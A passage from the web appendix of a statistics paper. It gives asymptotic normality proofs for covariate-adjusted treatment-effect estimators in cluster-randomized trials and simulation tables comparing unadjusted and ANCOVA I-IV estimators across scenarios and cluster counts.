\sum_{a\in\mathcal{A}}\left(\frac{1}{I_{a}}-\frac{1}{I}\right)\frac {1}{I-1}\sum_{i=1}^{I}\mathbf{U}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W} }_{i}^{a}\mathbf{U}_{i}^{a^{\prime}}-\sum_{a\neq a^{\prime}}\frac{1}{I}\frac{1}{I-1 }\sum_{i=1}^{I}\mathbf{U}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a ^{\prime}}\mathbf{U}_{i}^{a^{\prime}}\] \[= \sum_{a\in\mathcal{A}}\frac{1}{I_{a}}\frac{1}{I-1}\sum_{i=1}^{I} \mathbf{U}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\mathbf{U}_{i}^{a^{ \prime}}-\sum_{a,a^{\prime}\in\mathcal{A}}\frac{1}{I}\frac{1}{I-1}\sum_{i=1}^{I} \mathbf{U}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a}\widetilde{\mathbf{W}}_{i}^{a^{\prime}}\mathbf{U}_{i }^{a^{\prime}}\] \[= \sum_{a\in\mathcal{A}}\frac{1}{I_{a}}\mathbf{S}_{T}^{a}-\sum_{a,a^{ \prime}\in\mathcal{A}}\frac{1}{I}\mathbf{S}_{T}^{a,a^{\prime}}.\] Define \[\widetilde{\tau}^{w}=\sum_{j=1}^{J}\frac{w_{j}}{\sum_{j=1}^{J}w_{j}} \widetilde{\tau}_{j}^{w}=\sum_{j=1}^{J}\varpi_{j}\widetilde{\tau}_{j}^{w}= \mathbf{\varpi}^{\prime}\mathbf{h}(\overline{\mathbf{t}}),\] and since, \[\tau^{w}=\sum_{j=1}^{J}\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\tau_{j}^{ w}=\sum_{j=1}^{J}\varpi_{j}\tau_{j}^{w}=\mathbf{\varpi}^{\prime}\mathbf{h}(\overline{ \mathbf{T}}),\] we have, as \(I\rightarrow\infty\), \[\frac{\widetilde{\tau}^{w}-\tau^{w}}{\sqrt{\mathbf{\varpi}^{\prime} \mathbf{\Sigma}_{\tau}\mathbf{\varpi}}}\xrightarrow{d}\mathcal{N}\left(0,1\right).\] #### Web Appendix A2.2.2 Asymptotic normality with estimated covariate parameters Assume the following conditions for \(a\in\mathcal{A}\) and \(j\in\{1,\ldots,J\}\): 1. Define \[m_{jl}(\widetilde{\mathbf{X}})=\max_{1\leq i\leq I}\left(\frac{w_{ ij}}{\overline{w}_{j}}[\widetilde{\mathbf{X}}_{ij}]_{l}\right)^{2},\ \ \text{and}\ \ v_{jl}(\widetilde{\mathbf{X}})=\frac{1}{I-1}\sum_{i=1}^{I}\frac{w_{ ij}^{2}}{\overline{w}_{j}^{2}}[\widetilde{\mathbf{X}}_{ij}]_{l}^{2},\] for \(l\in\{1,\ldots,p\}\), and as \(I\rightarrow\infty\), \[\max_{a\in\mathcal{A}}\max_{1\leq j\leq J}\frac{m_{jl}(\widetilde{ \mathbf{X}})}{I_{a}v_{jl}(\widetilde{\mathbf{X}})}\to 0.\] For the asymptotic distribution of \(\widehat{\tau}^{w}\), under conditions (ii) and (iii), by Lemma A.1.1 of Schochet et al. (2021), we have \([\widetilde{\mathbf{X}}_{j}^{a}]_{l}=O_{p}(I^{-1/2})\), for \(a\in\mathcal{A}\) and \(l=1,\ldots,p\), where \[\widetilde{\mathbf{X}}_{j}^{a}=\frac{\sum_{i=1}^{I}w_{ij}G_{ia}\widetilde{\mathbf{X}}_ {ij}^{a}}{\sum_{i=1}^{I}w_{ij}G_{ia}}.\] This implies that \(\widetilde{\mathbf{X}}_{j}^{a}=\mathbf{O}_{p}(I^{-1/2})\), for \(a\in\mathcal{A}\). Using ANCOVA I as an example (results for other models follow analogously), we have \[\overline{u}_{j}^{a} =\frac{\sum_{i=1}^{I}w_{ij}G_{ia}\overline{U}_{ij}^{a}}{\sum_{i=1 }^{I}w_{ij}G_{ia}}=\frac{\sum_{i=1}^{I}w_{ij}G_{ia}\left(\overline{Y}_{ij}^{a} -\widetilde{\mathbf{X}}_{ij}\mathbf{\gamma}\right)}{\sum_{i=1}^{I}w_{ij}G_{ia}}=\frac {\sum_{i=1}^{I}w_{ij}G_{ia}\left\{\widetilde{U}_{ij}^{a}-\widetilde{\mathbf{X}}_{ ij}\left(\widehat{\mathbf{\gamma}}-\mathbf{\gamma}\right)\right\}}{\sum_{i=1}^{I}w_{ij}G_{ia}}\] \[=\widetilde{u}_{j}^{a}-\widetilde{\mathbf{X}}_{j}^{a}\left(\widehat{ \mathbf{\gamma}}-\mathbf{\gamma}\right).\] Since \(\widehat{\mathbf{\gamma}}\xrightarrow{p}\mathbf{\gamma}\), \(\widetilde{\mathbf{X}}_{j}^{a}\left(\widehat{\mathbf{\gamma}}-\mathbf{\gamma}\right)=o_{p }(I^{-1/2})\), which indicates that \(\widehat{\tau}^{w}\) and \(\widehat{\tau}^{w}\) have the same asymptotic distribution, i.e., \[\frac{\widehat{\tau}^{w}-\tau^{w}}{\sqrt{\mathbf{\varpi}^{\prime} \mathbf{\Sigma}_{\tau}\mathbf{\varpi}}}\xrightarrow{d}\mathcal{N}\left(0,1\right),\] therefore concluding Theorem 1. ## Web Appendix A3 Additional Simulation Results Figure A1: Relative bias (BIAS) of proposed estimators from simulation study I with 1,000 simulation replications. UN = unadjusted, AN I-IV = ANCOVA I-IV. ### Web Appendix A3.2 Simulation Study II #### Web Appendix A3.2.1 When the number of clusters \(I=18\) Table A2: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{4-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.152 & 0.173 & 0.201 & 0.164 & 0.951 & 0.911 \\ & AN I & -0.001 & 0.092 & 0.121 & 0.147 & 0.121 & 0.966 & 0.929 \\ & AN II & -0.005 & 0.106 & 0.132 & 0.144 & 0.118 & 0.941 & 0.890 \\ & AN III & -0.002 & 0.086 & 0.118 & 0.112 & 0.093 & 0.895 & 0.839 \\ & AN IV & -0.015 & 0.098 & 0.126 & 0.091 & 0.072 & 0.816 & 0.700 \\ \hline Scenario II & UN & -0.011 & 0.206 & 0.233 & 0.273 & 0.223 & 0.969 & 0.911 \\ & AN I & -0.005 & 0.121 & 0.169 & 0.186 & 0.154 & 0.937 & 0.888 \\ & AN II & -0.007 & 0.182 & 0.218 & 0.205 & 0.175 & 0.860 & 0.817 \\ & AN III & -0.003 & 0.114 & 0.162 & 0.149 & 0.123 & 0.902 & 0.848 \\ & AN IV & -0.002 & 0.164 & 0.211 & 0.111 & 0.089 & 0.703 & 0.617 \\ \hline Scenario III & UN & -0.005 & 0.165 & 0.196 & 0.226 & 0.184 & 0.958 & 0.913 \\ & AN I & -0.002 & 0.110 & 0.150 & 0.183 & 0.150 & 0.972 & 0.932 \\ & AN II & -0.005 & 0.129 & 0.163 & 0.178 & 0.148 & 0.946 & 0.896 \\ & AN III & 0.002 & 0.107 & 0.149 & 0.154 & 0.127 & 0.942 & 0.888 \\ & AN IV & 0.001 & 0.122 & 0.161 & 0.133 & 0.107 & 0.871 & 0.785 \\ \hline Scenario IV & UN & -0.024 & 0.162 & 0.183 & 0.208 & 0.169 & 0.969 & 0.933 \\ & AN I & -0.013 & 0.110 & 0.143 & 0.154 & 0.126 & 0.981 & 0.953 \\ & AN II & -0.018 & 0.124 & 0.156 & 0.152 & 0.126 & 0.956 & 0.913 \\ & AN III & -0.007 & 0.104 & 0.137 & 0.119 & 0.098 & 0.932 & 0.871 \\ & AN IV & -0.005 & 0.116 & 0.148 & 0.101 & 0.083 & 0.847 & 0.772 \\ \hline \hline \end{tabular} \end{table} Table A2: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{4-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.140 & 0.163 & 0.193 & 0.158 & 0.967 & 0.924 \\ & AN I & -0.002 & 0.079 & 0.114 & 0.143 & 0.117 & 0.976 & 0.940 \\ & AN II & -0.007 & 0.096 & 0.126 & 0.140 & 0.115 & 0.952 & 0.903 \\ & AN III & -0.001 & 0.073 & 0.109 & 0.108 & 0.089 & 0.918 & 0.850 \\ & AN IV & -0.012 & 0.084 & 0.117 & 0.090 & 0.072 & 0.833 & 0.749 \\ \hline Scenario II & UN & -0.015 & 0.192 & 0.213 & 0.248 & 0.202 & 0.957 & 0.906 \\ & AN I & -0.008 & 0.107 & 0.144 & 0.167 & 0.138 & 0.960 & 0.917 \\ & AN II & -0.010 & 0.142 & 0.172 & 0.173 & 0.147 & 0.903 & 0.862 \\ & AN III & -0.007 & 0.125 & 0.159 & 0.156 & 0.129 & 0.919 & 0.864 \\ & AN IV & -0.011 & 0.132 & 0.168 & 0.110 & 0.088 & 0.774 & 0.680 \\ \hline Scenario III & UN & -0.010 & 0.165 & 0.195 & 0.222 & 0.181 & 0.956 & 0.903 \\ & AN I & -0.007 & 0.116 & 0.153 & 0.182 & 0.149 & 0.964 & 0.925 \\ & AN II & -0.009 & 0.133 & 0.165 & 0.177 & 0.146 & 0.944 & 0.900 \\ & AN III & -0.008 & 0.112 & 0.150 & 0.154 & 0.127 & 0.948 & 0.882 \\ & AN IV & -0.018 & 0.124 & 0.160 & 0.131 & 0.104 & 0.880 & 0.784 \\ \hline Scenario IV & UN & -0.168 & 0.155 & 0.176 & 0.202 & 0.165 & 0.969 & 0.929 \\ & AN I & -0.161 & 0.105 & 0.137 & 0.154 & 0.126 & 0.982 & 0.950 \\ & AN II & -0.176 & 0.120 & 0.150 & 0.151 & 0.125 & 0.961 & 0.916 \\ & AN III & -0.155 & 0.100 & 0.132 & 0.120 & 0.099 & 0.937 & 0.889 \\ & AN IV & -0.172 & 0.109 & 0.140 & 0.102 & 0.082 & 0.880 & 0.791 \\ \hline \hline \end{tabular} \end{table} Table A3: Results for the period-average treatment effect (\(\tau^{period}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{6-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.138 & 0.161 & 0.194 & 0.158 & 0.968 & 0.929 \\ & AN I & -0.001 & 0.078 & 0.113 & 0.145 & 0.118 & 0.977 & 0.947 \\ & AN II & -0.006 & 0.093 & 0.124 & 0.142 & 0.117 & 0.962 & 0.912 \\ & AN III & -0.001 & 0.072 & 0.109 & 0.109 & 0.089 & 0.922 & 0.863 \\ & AN IV & -0.002 & 0.083 & 0.117 & 0.091 & 0.073 & 0.841 & 0.756 \\ \hline Scenario II & UN & -0.007 & 0.188 & 0.210 & 0.247 & 0.202 & 0.960 & 0.913 \\ & AN I & 0.003 & 0.104 & 0.142 & 0.169 & 0.140 & 0.965 & 0.926 \\ & AN II & 0.005 & 0.140 & 0.171 & 0.176 & 0.150 & 0.908 & 0.867 \\ & AN III & 0.004 & 0.120 & 0.155 & 0.159 & 0.132 & 0.937 & 0.881 \\ & AN IV & 0.012 & 0.130 & 0.167 & 0.114 & 0.091 & 0.801 & 0.719 \\ \hline Scenario III & UN & 0.015 & 0.162 & 0.192 & 0.224 & 0.183 & 0.964 & 0.910 \\ & AN I & 0.021 & 0.114 & 0.151 & 0.186 & 0.152 & 0.971 & 0.930 \\ & AN II & 0.028 & 0.130 & 0.163 & 0.181 & 0.149 & 0.949 & 0.895 \\ & AN III & 0.019 & 0.110 & 0.148 & 0.158 & 0.130 & 0.945 & 0.902 \\ & AN IV & 0.037 & 0.124 & 0.159 & 0.134 & 0.107 & 0.876 & 0.779 \\ \hline Scenario IV & UN & 0.078 & 0.151 & 0.174 & 0.205 & 0.167 & 0.976 & 0.945 \\ & AN I & 0.087 & 0.103 & 0.137 & 0.158 & 0.129 & 0.981 & 0.950 \\ & AN II & 0.082 & 0.117 & 0.150 & 0.156 & 0.129 & 0.958 & 0.920 \\ & AN III & 0.096 & 0.098 & 0.133 & 0.124 & 0.102 & 0.929 & 0.886 \\ & AN IV & 0.111 & 0.108 & 0.141 & 0.106 & 0.085 & 0.852 & 0.770 \\ \hline \hline \end{tabular} \end{table} Table A4: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. #### Web Appendix a3.2.2 When the number of clusters \(I=60\) Table A5: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{5-8} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.001 & 0.082 & 0.090 & 0.107 & 0.102 & 0.978 & 0.970 \\ & AN I & -0.002 & 0.049 & 0.063 & 0.081 & 0.077 & 0.985 & 0.981 \\ & AN II & -0.003 & 0.054 & 0.067 & 0.083 & 0.079 & 0.984 & 0.977 \\ & AN III & -0.002 & 0.047 & 0.062 & 0.065 & 0.062 & 0.948 & 0.938 \\ & AN IV & -0.006 & 0.049 & 0.063 & 0.061 & 0.058 & 0.931 & 0.921 \\ \hline Scenario II & UN & -0.003 & 0.111 & 0.131 & 0.140 & 0.133 & 0.960 & 0.942 \\ & AN I & 0.001 & 0.065 & 0.092 & 0.100 & 0.095 & 0.966 & 0.960 \\ & AN II & 0.002 & 0.094 & 0.113 & 0.116 & 0.112 & 0.933 & 0.932 \\ & AN III & 0.001 & 0.062 & 0.090 & 0.083 & 0.079 & 0.916 & 0.905 \\ & AN IV & 0.001 & 0.055 & 0.086 & 0.070 & 0.066 & 0.867 & 0.855 \\ \hline Scenario III & UN & -0.004 & 0.095 & 0.111 & 0.118 & 0.112 & 0.952 & 0.942 \\ & AN I & -0.001 & 0.062 & 0.084 & 0.096 & 0.091 & 0.972 & 0.963 \\ & AN II & -0.002 & 0.068 & 0.088 & 0.098 & 0.093 & 0.962 & 0.955 \\ & AN III & 0.001 & 0.059 & 0.081 & 0.083 & 0.079 & 0.956 & 0.941 \\ & AN IV & 0.001 & 0.060 & 0.083 & 0.079 & 0.076 & 0.938 & 0.922 \\ \hline Scenario IV & UN & 0.001 & 0.087 & 0.097 & 0.109 & 0.103 & 0.966 & 0.955 \\ & AN I & 0.002 & 0.058 & 0.073 & 0.083 & 0.079 & 0.991 & 0.980 \\ & AN II & 0.002 & 0.064 & 0.078 & 0.086 & 0.082 & 0.980 & 0.974 \\ & AN III & 0.003 & 0.055 & 0.071 & 0.066 & 0.063 & 0.921 & 0.913 \\ & AN IV & 0.004 & 0.058 & 0.074 & 0.064 & 0.061 & 0.905 & 0.894 \\ \hline \hline \end{tabular} \end{table} Table A5: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{6-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.001 & 0.076 & 0.085 & 0.102 & 0.097 & 0.980 & 0.971 \\ & AN I & -0.002 & 0.042 & 0.058 & 0.077 & 0.073 & 0.985 & 0.979 \\ & AN II & -0.003 & 0.048 & 0.062 & 0.080 & 0.076 & 0.985 & 0.977 \\ & AN III & -0.002 & 0.040 & 0.056 & 0.060 & 0.057 & 0.952 & 0.945 \\ & AN IV & -0.005 & 0.041 & 0.057 & 0.057 & 0.054 & 0.944 & 0.926 \\ \hline Scenario II & UN & -0.004 & 0.103 & 0.117 & 0.127 & 0.121 & 0.964 & 0.947 \\ & AN I & -0.001 & 0.058 & 0.080 & 0.089 & 0.085 & 0.969 & 0.962 \\ & AN II & 0.001 & 0.074 & 0.091 & 0.097 & 0.093 & 0.943 & 0.940 \\ & AN III & -0.001 & 0.067 & 0.087 & 0.087 & 0.083 & 0.944 & 0.936 \\ & AN IV & -0.002 & 0.052 & 0.075 & 0.068 & 0.064 & 0.918 & 0.898 \\ \hline Scenario III & UN & -0.006 & 0.094 & 0.110 & 0.117 & 0.111 & 0.956 & 0.944 \\ & AN I & -0.004 & 0.064 & 0.084 & 0.097 & 0.092 & 0.973 & 0.967 \\ & AN II & -0.006 & 0.070 & 0.089 & 0.098 & 0.093 & 0.964 & 0.953 \\ & AN III & -0.004 & 0.061 & 0.082 & 0.084 & 0.080 & 0.956 & 0.939 \\ & AN IV & -0.008 & 0.064 & 0.084 & 0.080 & 0.076 & 0.928 & 0.913 \\ \hline Scenario IV & UN & -0.001 & 0.083 & 0.092 & 0.106 & 0.101 & 0.973 & 0.967 \\ & AN I & -0.001 & 0.055 & 0.069 & 0.083 & 0.079 & 0.990 & 0.984 \\ & AN II & -0.001 & 0.061 & 0.075 & 0.085 & 0.081 & 0.984 & 0.980 \\ & AN III & -0.001 & 0.052 & 0.068 & 0.067 & 0.063 & 0.938 & 0.922 \\ & AN IV & -0.003 & 0.055 & 0.071 & 0.064 & 0.061 & 0.918 & 0.900 \\ \hline \hline \end{tabular} \end{table} Table 6: Results for the period-average treatment effect (\(\tau^{period}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{6-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.001 & 0.074 & 0.084 & 0.101 & 0.096 & 0.984 & 0.973 \\ & AN I & -0.002 & 0.041 & 0.057 & 0.077 & 0.073 & 0.986 & 0.980 \\ & AN II & -0.003 & 0.047 & 0.061 & 0.079 & 0.076 & 0.987 & 0.981 \\ & AN III & -0.002 & 0.039 & 0.056 & 0.060 & 0.057 & 0.952 & 0.948 \\ & AN IV & -0.005 & 0.040 & 0.057 & 0.057 & 0.054 & 0.945 & 0.936 \\ \hline Scenario II & UN & -0.002 & 0.101 & 0.115 & 0.126 & 0.120 & 0.954 & 0.944 \\ & AN I & 0.003 & 0.058 & 0.079 & 0.089 & 0.085 & 0.971 & 0.962 \\ & AN II & 0.005 & 0.074 & 0.091 & 0.097 & 0.093 & 0.951 & 0.945 \\ & AN III & 0.003 & 0.066 & 0.086 & 0.087 & 0.083 & 0.953 & 0.940 \\ & AN IV & 0.005 & 0.053 & 0.075 & 0.069 & 0.065 & 0.920 & 0.900 \\ \hline Scenario III & UN & -0.001 & 0.093 & 0.109 & 0.116 & 0.110 & 0.957 & 0.942 \\ & AN I & 0.003 & 0.063 & 0.084 & 0.097 & 0.092 & 0.976 & 0.967 \\ & AN II & 0.004 & 0.069 & 0.088 & 0.098 & 0.094 & 0.966 & 0.959 \\ & AN III & 0.003 & 0.061 & 0.082 & 0.085 & 0.080 & 0.955 & 0.947 \\ & AN IV & 0.008 & 0.063 & 0.084 & 0.081 & 0.077 & 0.934 & 0.927 \\ \hline Scenario IV & UN & 0.006 & 0.083 & 0.092 & 0.106 & 0.101 & 0.970 & 0.963 \\ & AN I & 0.007 & 0.056 & 0.070 & 0.084 & 0.080 & 0.985 & 0.980 \\ & AN II & 0.009 & 0.062 & 0.075 & 0.086 & 0.082 & 0.978 & 0.968 \\ & AN III & 0.007 & 0.054 & 0.068 & 0.068 & 0.065 & 0.931 & 0.918 \\ & AN IV & 0.013 & 0.056 & 0.071 & 0.065 & 0.062 & 0.911 & 0.898 \\ \hline \hline \end{tabular} \end{table} Table 10: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. Web Appendix A4 Additional Simulation Results with Cluster-Period Cell Size as an Additional Covariate Web Appendix A4.1 Simulation Study I \begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{6-9} \(I\) & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline 18 & UN & -0.031 & 0.153 & 0.174 & 0.207 & 0.169 & 0.965 & 0.913 \\ & AN I & -0.018 & 0.085 & 0.118 & 0.152 & 0.125 & 0.978 & 0.941 \\ & AN II & -0.032 & 0.117 & 0.141 & 0.146 & 0.123 & 0.927 & 0.884 \\ & AN III & 0.002 & 0.074 & 0.111 & 0.106 & 0.087 & 0.904 & 0.849 \\ & AN IV & 0.023 & 0.232 & 0.240 & 0.070 & 0.077 & 0.626 & 0.609 \\ \hline 30 & UN & -0.022 & 0.121 & 0.136 & 0.156 & 0.139 & 0.965 & 0.942 \\ & AN I & -0.008 & 0.068 & 0.094 & 0.115 & 0.104 & 0.981 & 0.962 \\ & AN II & -0.021 & 0.091 & 0.111 & 0.118 & 0.107 & 0.941 & 0.928 \\ & AN III & 0.005 & 0.060 & 0.088 & 0.083 & 0.074 & 0.920 & 0.879 \\ & AN IV & 0.016 & 0.073 & 0.098 & 0.067 & 0.061 & 0.804 & 0.760 \\ \hline 60 & UN & -0.006 & 0.081 & 0.090 & 0.109 & 0.103 & 0.981 & 0.972 \\ & AN I & -0.002 & 0.045 & 0.061 & 0.082 & 0.078 & 0.990 & 0.985 \\ & AN II & -0.007 & 0.058 & 0.071 & 0.087 & 0.083 & 0.976 & 0.971 \\ & AN III & 0.005 & 0.040 & 0.058 & 0.060 & 0.057 & 0.950 & 0.940 \\ & AN IV & 0.010 & 0.042 & 0.059 & 0.054 & 0.052 & 0.915 & 0.903 \\ \hline 120 & UN & -0.002 & 0.059 & 0.066 & 0.076 & 0.074 & 0.971 & 0.967 \\ & AN I & -0.002 & 0.033 & 0.046 & 0.057 & 0.056 & 0.982 & 0.980 \\ & AN II & -0.005 & 0.042 & 0.052 & 0.062 & 0.060 & 0.975 & 0.972 \\ & AN III & 0.002 & 0.029 & 0.044 & 0.042 & 0.041 & 0.939 & 0.934 \\ & AN IV & 0.004 & 0.030 & 0.044 & 0.040 & 0.039 & 0.918 & 0.915 \\ \hline \hline \end{tabular} \end{table} Table A9: Results for the period-average treatment effect (\(\tau^{period}\)) from simulation study I comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV. Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{4-9} \(I\) & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline 18 & UN & -0.012 & 0.149 & 0.171 & 0.210 & 0.171 & 0.963 & 0.923 \\ & AN I & 0.003 & 0.083 & 0.117 & 0.154 & 0.127 & 0.978 & 0.956 \\ & AN II & 0.016 & 0.113 & 0.139 & 0.149 & 0.125 & 0.939 & 0.888 \\ & AN III & 0.001 & 0.073 & 0.111 & 0.107 & 0.089 & 0.907 & 0.855 \\ & AN IV & 0.030 & 0.230 & 0.240 & 0.071 & 0.076 & 0.644 & 0.618 \\ \hline 30 & UN & -0.014 & 0.119 & 0.134 & 0.157 & 0.140 & 0.971 & 0.946 \\ & AN I & 0.006 & 0.068 & 0.093 & 0.116 & 0.104 & 0.977 & 0.965 \\ & AN II & 0.009 & 0.090 & 0.110 & 0.119 & 0.108 & 0.952 & 0.935 \\ & AN III & 0.006 & 0.060 & 0.087 & 0.083 & 0.074 & 0.916 & 0.886 \\ & AN IV & 0.020 & 0.073 & 0.098 & 0.067 & 0.061 & 0.809 & 0.769 \\ \hline 60 & UN & -0.001 & 0.079 & 0.089 & 0.109 & 0.103 & 0.980 & 0.975 \\ & AN I & 0.005 & 0.044 & 0.060 & 0.082 & 0.078 & 0.991 & 0.986 \\ & AN II & 0.007 & 0.056 & 0.070 & 0.087 & 0.083 & 0.984 & 0.980 \\ & AN III & 0.005 & 0.039 & 0.057 & 0.060 & 0.057 & 0.954 & 0.944 \\ & AN IV & 0.011 & 0.041 & 0.059 & 0.054 & 0.052 & 0.934 & 0.915 \\ \hline 120 & UN & 0.001 & 0.058 & 0.066 & 0.076 & 0.074 & 0.969 & 0.967 \\ & AN I & 0.011 & 0.032 & 0.046 & 0.057 & 0.056 & 0.984 & 0.982 \\ & AN II & 0.002 & 0.041 & 0.053 & 0.062 & 0.060 & 0.973 & 0.969 \\ & AN III & 0.001 & 0.029 & 0.043 & 0.042 & 0.041 & 0.931 & 0.924 \\ & AN IV & 0.004 & 0.029 & 0.044 & 0.040 & 0.039 & 0.919 & 0.910 \\ \hline \hline \end{tabular} \end{table} Table 10: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study I comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV. Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. Figure A2: Relative bias (BIAS) of proposed estimators from simulation study I with 1,000 simulation replications with cell size as a covariate. UN = unadjusted, AN I-IV = ANCOVA I-IV. ### Web Appendix A4.2 Simulation Study II #### Web Appendix A4.2.1 When the number of clusters \(I=18\) Table A11: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. \begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{4-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.152 & 0.173 & 0.201 & 0.164 & 0.951 & 0.911 \\ & AN I & -0.001 & 0.092 & 0.121 & 0.146 & 0.119 & 0.963 & 0.927 \\ & AN II & -0.006 & 0.107 & 0.132 & 0.135 & 0.111 & 0.926 & 0.870 \\ & AN III & -0.002 & 0.087 & 0.119 & 0.109 & 0.091 & 0.883 & 0.831 \\ & AN IV & -0.009 & 0.322 